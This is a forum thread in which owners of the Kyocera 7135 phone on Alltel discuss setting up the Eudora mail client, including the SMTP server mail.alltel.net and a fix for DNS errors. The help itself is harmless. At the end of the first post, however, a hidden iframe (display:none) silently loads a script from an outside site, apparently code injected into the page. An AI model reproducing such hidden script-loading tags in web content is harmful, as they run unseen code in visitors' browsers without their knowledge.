+ Reply to Thread

Alltel tech support spectacularly uninformed about 7135

Setting up Eudora on my 7135 I needed to know what SMTP server to use when sending mail. On Verizon, this was Airtouch.

I'll just make a quick tech support call.
    :rofl

30 min of pain later:
    "Alltel tech in doublequotes", 'me in single'
    :argue

"You need to call Eudora"

'But they won't have any idea which mail server I need to use!'

"Sir, I've tried calling Kyocera and they said they don't know. You need to call Eudora"

'Of course Kyo doesn't know! They make the hardware. Eudora makes the software, and Alltel is providing the Internet service.'

"No, we're not."

'Pardon me?'

"We aren't providing you internet service"

'My phone can access the internet. Who's providing the service?'

"Eudora is."

'No. They make the mail program. They are not running the Alltel mail server.'

"Look sir, I've talked to two senior techs. We don't provide Internet service. You need to call Eudora."

I gave up at this point.

Eventually I found that I can relay through mail.alltel.net

This is pathetic. I understand that the 7135 is new, but they've been selling the 6035 for a year and it has the same issues. Anyone know a number for higher-level TS or data TS at Alltel?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I feel your pain....I mean I felt your pain and then i walked over and activated on verizon Alltel is really missing some huge opportunities to convert some VZW customers.

Originally posted by pdageek
    I feel your pain....I mean I felt your pain and then i walked over and activated on verizon Alltel is really missing some huge opportunities to convert some VZW customers.
    I may yet end up back there. I've got a TAP issue that looks unlikely to get resolved (unless I can find a tech with a clue). If that doesn't get fixed then I'll be returning the phone before the 30 day try-out period is up.

Originally posted by LongTimeLurker
    I may yet end up back there. I've got a TAP issue that looks unlikely to get resolved (unless I can find a tech with a clue). If that doesn't get fixed then I'll be returning the phone before the 30 day try-out period is up.
    Where did you purchase your 7135 that they gave you a 30 day trial? I was told by GetConnected that the return policy is within 7 days and under 30 minutes of talktime.

Originally posted by MikeW
    Where did you purchase your 7135 that they gave you a 30 day trial? I was told by GetConnected that the return policy is within 7 days and under 30 minutes of talktime.
    Direct from Alltel. They give you 30 days to cancel the contract and return the equipment. You just pay for the airtime used.

Well, I can't get eudora mail to work at all. It can't find my pop servers. I got exactly the same run around you did, and I have YET to get it fixed!!

Got any hints??

Richard

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

EUDORA MAIL

What server are u all trying to connect too to get Eudora to work?

Is your mail with alltel? or another carrier?

My Eudora works great and I am on Alltel and I pull my mail from 5 accounts.
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

Mine is with Alltel. I'm trying to get email from two different pop3 servers. It worked fine on my 6035. I can use the wap browser fine, but when I try to use Eudora or any PQAs, I get DNS errors (DNS not configured properly) My phone is set to Query DNS, and they told me that was right, but it doesn't work. I never did talk with anyone with the SLIGHTEST clue at Alltell or Kyocera.

Richard

Eudora

Here is what your need i think.

To get alltel mail the server is mail.alltel.net both in and outgoing servers

Go into Eudora and click on the menu button then options then new accounts. From there you will need to enter your mail info.

Then you need your userid/username and password, make sure that it is spelled correctly and upper and lower case.

Make sure your go under all the tabs and enter the infomation. You may have different incoming and outgoing servers for mail.

That should be all you need to set up the accounts?
    GREG HARKINS
    www.bringingfuntoyou.com

ALLTEL FAQ LINK

HERE IS A LINK TO ALLTEL FAQ THAT MIGHT HELP WITH ANY FUTURE QUESTIONS SOMEONE MIGHT HAVE.

I know it says hosting but this is there mail server.

http://hosting.alltel.net/support.htm
    GREG HARKINS
    www.bringingfuntoyou.com

Well, I know how to set up the accounts, the issue is with the DNS service I think. I don't know if it's a phone problem or a network problem, and I dang sure couldn't talk to anybody who know anything about it!!

connection

can you connect to the internet just by using your network connection?

I am in Wv and i use QNC and i connect every time with our fail.

What area are you in.
    GREG HARKINS
    www.bringingfuntoyou.com

Yeah, I can connect fine, and can use the Openwave Browser just fine. I found my problem and fixed it though. For some reason, having "query DNS" checked wasn't working for me (on the network details screen.) I unchecked that and entered the Primary and Secondary DNS numbers I found on the FAQ you posted, and that fixed everything.

I am in Montgomery. I use the 1x High Speed Data to connect, but it defaults back to regular QNC since we don't have 1x yet.

Like I said, I never had any trouble connecting, just got DNS errors when I tried to do pop mail or PQAs. Working great now, though, thanks!!

Richard